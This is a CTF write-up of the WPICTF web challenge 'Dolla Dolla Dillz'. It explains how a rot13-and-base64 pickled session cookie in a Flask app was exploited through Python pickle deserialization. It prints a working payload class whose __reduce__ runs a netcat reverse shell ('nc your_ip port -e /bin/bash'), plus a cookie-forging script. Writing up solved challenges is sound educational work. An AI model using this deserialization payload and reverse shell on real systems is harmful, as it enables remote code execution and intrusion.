WEB – Dolla Dolla Dillz

Dolla Dolla Dillz Writeup by Srdnlen

Category: WEB. Solves: 8 Points: 200

Description:

(=^・ω・^=)

http://dillz.wpictf.xyz

made by: ollien

Note: cataas.com is NOT part of this challenge

Writeup

The website looks pretty simple in the frontend, we have a login form and a registration form in which we tried some injections that didn't work, after we log-in we have a random image but nothing interesting. On the cookie side we have some interesting stuff, after we register a cookie is set that then disappears when we get redirected to the login form where we get a message of successful registration

From this cookie we understand that flask is runnign in the backend and this is important.
Then we login and another cookie is set, a token that looks like a base64 but after some tries and with the help of prevoius years writeups we discover that it was encoded as a base64 and rot13. After we decode it we obtain this:

cdbal
Session
q)q}qXtokenqX$bb05b8da-82f1-11ea-a968-0242ac120003qsb.

So we have some readable stuff, enough to start googling about dbal, python and session tokens. After a while we find something about pickle library in python which is vulnerable to deserialization of cookies (something similar to the more known php deserialization).
Knowing this we try to deserialize the cookie we have so that we can analyze the object but we need to implement a custom module named dbal and in it we need a class Session (python runtime errors suggested this stuff). So after we are able to pickle.loads(cookie) we are also able to create a custom Session object in which we put a <code>reduce</code> function that can execute any command we want. First we try with a simple "ls" but it doesn't work because we have no visual feedback in the website so we need to create a reverse shell. To do that we use the following python scripts to create the cookie we need:

dbal.py

import os
class Session:
    def __reduce__(self):
        return (os.system, (&#039;nc your_ip port -e /bin/bash&#039;, ))

dolla_dolla.py

import base64
import pickle
import os
import dbal
def rot13(s):
    from codecs import encode
    return encode(s, &#039;rot13&#039;)
token = &quot;tNAwMTWuoNcGMKAmnJ9hPaRNXLSkNK1kNytSNNNNqT9eMJ5kN1txNNNNAGp5MQH5Z2RgBQR1Mv0kZJIuYJSxAwLgZQV0ZzSwZGVjZQNmpDEmLv4=&quot;
rotted = rot13(token)
based = base64.b64decode(rotted)
pickled = pickle.loads(based)
print(pickled)
pickled2 = rot13(str(base64.b64encode(pickle.dumps(pickled))))
pickled2 = pickled2[2:len(pickled2)-1]
print(pickled2)

So we generate a token that will execute our reverse shell

We send it with burp

And we receive reverse shell

WPI{br34d_4nd_bu773r_5ux}

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *